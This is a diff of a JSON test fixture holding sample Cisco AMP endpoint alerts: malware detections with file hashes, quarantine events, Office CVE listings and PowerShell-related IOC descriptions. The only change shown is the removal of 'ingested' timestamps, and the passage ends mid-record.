@@ -2022,7 +1998,6 @@ ], "code": "553648173", "id": "6508191586038317000", - "ingested": "2022-02-02T05:52:16.386299055Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6508191586038317000,\"timestamp\":1610584030,\"timestamp_nanoseconds\":579890366,\"date\":\"2021-01-14T00:27:10+00:00\",\"event_type\":\"File Fetch Completed\",\"event_type_id\":553648173,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"resume.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Desktop\\\\resume.exe\",\"identity\":{\"sha256\":\"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86\",\"sha1\":\"5ca4bef8de6def53519d4b22632675bb4c1e470b\",\"md5\":\"41476df3138717868118d8542cf3d1d6\"}}}}", "severity": 0 
@@ -2096,7 +2071,6 @@ "action": "Policy Update", "code": "553648130", "id": "6583671182384431000", - "ingested": "2022-02-02T05:52:16.386300048Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6583671182384431000,\"timestamp\":1610582528,\"timestamp_nanoseconds\":614000000,\"date\":\"2021-01-14T00:02:08+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_MAP_FriedEx\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"04:e6:4d:d5:7a:b5\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}", "severity": 0 
@@ -2164,7 +2138,6 @@ ], "code": "2164260893", "id": "6411132837046518000", - "ingested": "2022-02-02T05:52:16.386301039Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411132837046518000,\"timestamp\":1610552212,\"timestamp_nanoseconds\":695000000,\"date\":\"2021-01-13T15:36:52+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6411132837046517762\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960\"}}}}", "severity": 3 
@@ -2236,7 +2209,6 @@ ], "code": "553648155", "id": "6411132837046518000", - "ingested": "2022-02-02T05:52:16.386316487Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411132837046518000,\"timestamp\":1610552212,\"timestamp_nanoseconds\":691000000,\"date\":\"2021-01-13T15:36:52+00:00\",\"event_type\":\"Retrospective Quarantine\",\"event_type_id\":553648155,\"detection_id\":\"6411132837046517761\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960\"}}}}", "severity": 3 
@@ -2310,7 +2282,6 @@ ], "code": "553648147", "id": "6411132837046518000", - "ingested": "2022-02-02T05:52:16.386317480Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411132837046518000,\"timestamp\":1610552212,\"timestamp_nanoseconds\":684000000,\"date\":\"2021-01-13T15:36:52+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.0B965CA8AF-95.SBX.TG\",\"detection_id\":\"6411132837046517762\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"11179468.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\11179468.exe\",\"identity\":{\"sha256\":\"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960\"}}}}", "severity": 3 
@@ -2390,7 +2361,6 @@ ], "code": "553648147", "id": "6411132837046518000", - "ingested": "2022-02-02T05:52:16.386318435Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411132837046518000,\"timestamp\":1610552212,\"timestamp_nanoseconds\":682000000,\"date\":\"2021-01-13T15:36:52+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.0B965CA8AF-95.SBX.TG\",\"detection_id\":\"6411132837046517761\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"MspthrdHash.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\MspthrdHash\\\\MspthrdHash.exe\",\"identity\":{\"sha256\":\"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960\",\"sha1\":\"5faebef3bb880489195e80e6656ccf442ff7123b\",\"md5\":\"84b6f7be5370c1998886214790c6892b\"}}}}", "severity": 3 
@@ -2571,7 +2541,6 @@ ], "code": "1107296279", "id": "15152998206589", - "ingested": "2022-02-02T05:52:16.386319394Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":15152998206589,\"timestamp\":1610534253,\"timestamp_nanoseconds\":0,\"date\":\"2021-01-13T10:37:33+00:00\",\"event_type\":\"Vulnerable Application Detected\",\"event_type_id\":1107296279,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Low\",\"start_timestamp\":1610534253,\"start_date\":\"2021-01-13T10:37:33+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"WINWORD.EXE\",\"identity\":{\"sha256\":\"3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"d5bc504277172be5c54b60ad5c13209dc1f729131def084de3ec8c72e54c58ef\"}}},\"vulnerabilities\":[{\"name\":\"Microsoft 
Office\",\"version\":\"2013\",\"cve\":\"CVE-2014-0260\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0260\"},{\"cve\":\"CVE-2014-1761\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-1761\"},{\"cve\":\"CVE-2014-6357\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6357\"},{\"cve\":\"CVE-2015-0085\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0085\"},{\"cve\":\"CVE-2015-0086\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0086\"},{\"cve\":\"CVE-2015-1641\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1641\"},{\"cve\":\"CVE-2015-1650\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1650\"},{\"cve\":\"CVE-2015-1682\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1682\"},{\"cve\":\"CVE-2015-2379\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2379\"},{\"cve\":\"CVE-2015-2380\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2380\"},{\"cve\":\"CVE-2015-2424\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2424\"},{\"cve\":\"CVE-2016-0127\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-0127\"},{\"cve\":\"CVE-2016-7193\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-7193\"},{\"cve\":\"CVE-2017-0292\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0292\"},{\"cve\":\"CVE-2017-11826\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11826\"}]}}", "severity": 1, 
@@ -2642,7 +2611,6 @@ "action": "Policy Update", "code": "553648130", "id": "6508159571352093000", - "ingested": "2022-02-02T05:52:16.386320341Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6508159571352093000,\"timestamp\":1610533415,\"timestamp_nanoseconds\":349000000,\"date\":\"2021-01-13T10:23:35+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}", "severity": 0 
@@ -2713,7 +2681,6 @@ ], "code": "1107296274", "id": "1515298360312529000", - "ingested": "2022-02-02T05:52:16.386321291Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1515298360312529000,\"timestamp\":1610532793,\"timestamp_nanoseconds\":312509000,\"date\":\"2021-01-13T10:13:13+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610532793,\"start_date\":\"2021-01-13T10:13:13+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. 
Malware authors may use this to download items, rename them, execute and delete them with a single command.\",\"short_description\":\"W32.PowershellDownloadedExecutable.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"PowerShell.exe\",\"file_path\":\"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/PowerShell.exe\",\"identity\":{\"sha256\":\"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2\"}}}}}", "severity": 3, 
@@ -2800,7 +2767,6 @@ ], "code": "1107296274", "id": "1515298355162029000", - "ingested": "2022-02-02T05:52:16.386322282Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1515298355162029000,\"timestamp\":1610532788,\"timestamp_nanoseconds\":162019000,\"date\":\"2021-01-13T10:13:08+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610532788,\"start_date\":\"2021-01-13T10:13:08+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Microsoft Word launched PowerShell. This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables.\",\"short_description\":\"W32.WinWord.Powershell\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"PowerShell.exe\",\"file_path\":\"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/PowerShell.exe\",\"identity\":{\"sha256\":\"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2\"}}}}}", "severity": 2, 
@@ -2880,7 +2846,6 @@ ], "code": "553648143", "id": "6508153524038140000", - "ingested": "2022-02-02T05:52:16.386323392Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6508153524038140000,\"timestamp\":1610532007,\"timestamp_nanoseconds\":606000000,\"date\":\"2021-01-13T10:00:07+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6508153524038139905\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"4a45dbc60436fc72fbd8a8bf81995c378575142e0022015f29a4b25546e19cef\"}}}}", "severity": 2 
@@ -2959,7 +2924,6 @@ ], "code": "1107296274", "id": "1521062325693667300", - "ingested": "2022-02-02T05:52:16.386324366Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1521062325693667300,\"timestamp\":1610447087,\"timestamp_nanoseconds\":693632000,\"date\":\"2021-01-12T10:24:47+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610447087,\"start_date\":\"2021-01-12T10:24:47+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Exploit_Prevention_Audit\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"d2:78:15:4a:f4:a2\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. 
Malware authors may use this to download items, rename them, execute and delete them with a single command.\",\"short_description\":\"W32.PowershellDownloadedExecutable.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"powershell.exe\",\"file_path\":\"/C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe\",\"identity\":{\"sha256\":\"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae\"}}}}}", "severity": 3, @@ -3031,7 +2995,6 @@ "action": "Policy Update", "code": "553648130", "id": "6532910514396201000", - "ingested": "2022-02-02T05:52:16.386325346Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6532910514396201000,\"timestamp\":1610446522,\"timestamp_nanoseconds\":872000000,\"date\":\"2021-01-12T10:15:22+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Exploit_Prevention_Audit\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"d2:78:15:4a:f4:a2\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}", "severity": 0 
@@ -3101,7 +3064,6 @@ ], "code": "1090519054", "id": "6525520937264087000", - "ingested": "2022-02-02T05:52:16.386326320Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6525520937264087000,\"timestamp\":1608875349,\"timestamp_nanoseconds\":661000000,\"date\":\"2020-12-25T05:49:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.GenericKD:Malwaregen.21do.1201\",\"detection_id\":\"6525520937264087041\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"OLD.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Desktop\\\\OLD.exe\",\"identity\":{\"sha256\":\"edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9\",\"sha1\":\"26de43cc558a4e0e60eddd4dc9321bcb5a0a181c\",\"md5\":\"cfdd16225e67471f5ef54cab9b3a5558\"},\"parent\":{\"process_id\":2632,\"disposition\":\"Clean\",\"file_name\":\"explorer.exe\",\"identity\":{\"sha256\":\"d5bc504277172be5c54b60ad5c13209dc1f729131def084de3ec8c72e54c58ef\",\"sha1\":\"84123a3decdaa217e3588a1de59fe6cee1998004\",\"md5\":\"38ae1b3c38faef56fe4907922f0385ba\"}}}}}", "severity": 2 
@@ -3198,7 +3160,6 @@ ], "code": "553648143", "id": "6525520937264087000", - "ingested": "2022-02-02T05:52:16.386327298Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6525520937264087000,\"timestamp\":1608875349,\"timestamp_nanoseconds\":661000000,\"date\":\"2020-12-25T05:49:09+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6525520937264087041\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9\"}}}}", "severity": 2 
@@ -3276,7 +3237,6 @@ ], "code": "1090519054", "id": "6525516191325225000", - "ingested": "2022-02-02T05:52:16.386328283Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6525516191325225000,\"timestamp\":1608874244,\"timestamp_nanoseconds\":500000000,\"date\":\"2020-12-25T05:30:44+00:00\",\"event_type\":\"Threat 